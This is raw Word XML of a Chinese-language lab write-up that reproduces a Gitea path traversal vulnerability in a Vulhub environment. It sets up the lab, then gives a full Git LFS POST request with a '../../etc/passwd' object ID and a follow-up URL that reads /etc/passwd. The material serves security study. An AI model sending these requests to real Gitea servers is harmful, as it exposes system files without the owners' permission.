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764" w:rsidRPr="00595063" w:rsidRDefault="00595063">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595063">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRDefault="00595063">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、Vu</w:t>
      </w:r>
      <w:r>
        <w:t>lhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRDefault="00B646E6">
      <w:r w:rsidRPr="00B646E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="172363"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="C:\Users\Toby\AppData\Local\Temp\165346957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469576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063" w:rsidRDefault="00595063">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问3</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，进入安装，填写管理员账号密码，并修改网站U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其他的默认</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRDefault="00B646E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="442521F0" wp14:editId="222957A8">
            <wp:extent cx="5274310" cy="21507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063" w:rsidRDefault="00595063">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、创建一个公开的仓库，并添加一些文件进去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRPr="00595063" w:rsidRDefault="00B646E6">
      <w:r w:rsidRPr="00B646E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="5078468"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="3" name="图片 3" descr="C:\Users\Toby\AppData\Local\Temp\165346993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by\AppData\Local\Temp\1653469936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063" w:rsidRDefault="00595063">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、重启g</w:t>
      </w:r>
      <w:r>
        <w:t>itea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker-compose restart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRDefault="00B646E6">
      <w:r w:rsidRPr="00B646E6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="264925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="4" name="图片 4" descr="C:\Users\Toby\AppData\Local\Temp\165347015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by\AppData\Local\Temp\1653470152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6E6" w:rsidRDefault="00B646E6"/>
    <w:p w:rsidR="00595063" w:rsidRPr="00595063" w:rsidRDefault="00595063">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595063">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRDefault="00CC1A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246370" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1143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6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A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>POST /vulhub/repo.git/info/lfs/objects HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Host: your-ip:3000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Accept-Encoding: gzip, deflate</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Accept: application/vnd.git-lfs+json</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Accept-Language: en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Connection: close</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Content-Type: application/json</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>Content-Length: 151</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45"/>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t>{</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t xml:space="preserve">    "Oid": "....../../../etc/passwd",</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t xml:space="preserve">    "Size": 1000000,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t xml:space="preserve">    "User" : "a",</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t xml:space="preserve">    "Password" : "a",</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t xml:space="preserve">    "Repo" : "a",</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45">
                              <w:t xml:space="preserve">    "Authorization" : "a"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                            <w:r w:rsidRPr="00CC1A45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0pt;width:413.1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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>POST /vulhub/repo.git/info/lfs/objects HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Host: your-ip:3000</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Accept-Encoding: gzip, deflate</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Accept: application/vnd.git-lfs+json</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Connection: close</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Content-Type: application/json</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>Content-Length: 151</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45"/>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t xml:space="preserve">    "Oid": "....../../../etc/passwd",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t xml:space="preserve">    "Size": 1000000,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t xml:space="preserve">    "User" : "a",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t xml:space="preserve">    "Password" : "a",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t xml:space="preserve">    "Repo" : "a",</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45">
                        <w:t xml:space="preserve">    "Authorization" : "a"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00CC1A45" w:rsidRDefault="00CC1A45" w:rsidP="00CC1A45">
                      <w:r w:rsidRPr="00CC1A45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5063">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、找到刚刚创建的公开项目，发送如下数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1A45" w:rsidRPr="00CC1A45" w:rsidRDefault="00CC1A45">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00595063" w:rsidRDefault="00B646E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70320644" wp14:editId="7E52358A">
            <wp:extent cx="5274310" cy="40614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063" w:rsidRDefault="00595063">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00B646E6" w:rsidRPr="00037710">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidR="00B646E6" w:rsidRPr="00037710">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ttp</w:t>
        </w:r>
        <w:r w:rsidR="00B646E6" w:rsidRPr="00037710">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r w:rsidR="00B646E6" w:rsidRPr="00037710">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>//ip:3000/admin/zmsn.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即可查看到/</w:t>
      </w:r>
      <w:r>
        <w:t>etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功被读取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B646E6" w:rsidRDefault="00B646E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCF5D08" wp14:editId="7FE33BD4">
            <wp:extent cx="5274310" cy="37947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52D" w:rsidRDefault="00E5652D" w:rsidP="00595063">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E5652D" w:rsidRDefault="00E5652D" w:rsidP="00595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52D" w:rsidRDefault="00E5652D" w:rsidP="00595063">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E5652D" w:rsidRDefault="00E5652D" w:rsidP="005950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32E"/>
    <w:rsid w:val="004A732E"/>
    <w:rsid w:val="00595063"/>
    <w:rsid w:val="007A5174"/>
    <w:rsid w:val="00B646E6"/>
    <w:rsid w:val="00CC1A45"/>
    <w:rsid w:val="00D20764"/>
    <w:rsid w:val="00E5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F328F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DC31E4EF-6DBC-4B16-9541-8CC8A8AB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5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50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5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5063"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005950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2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ip:3000/admin/zmsn.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-25T09:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-25T15:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>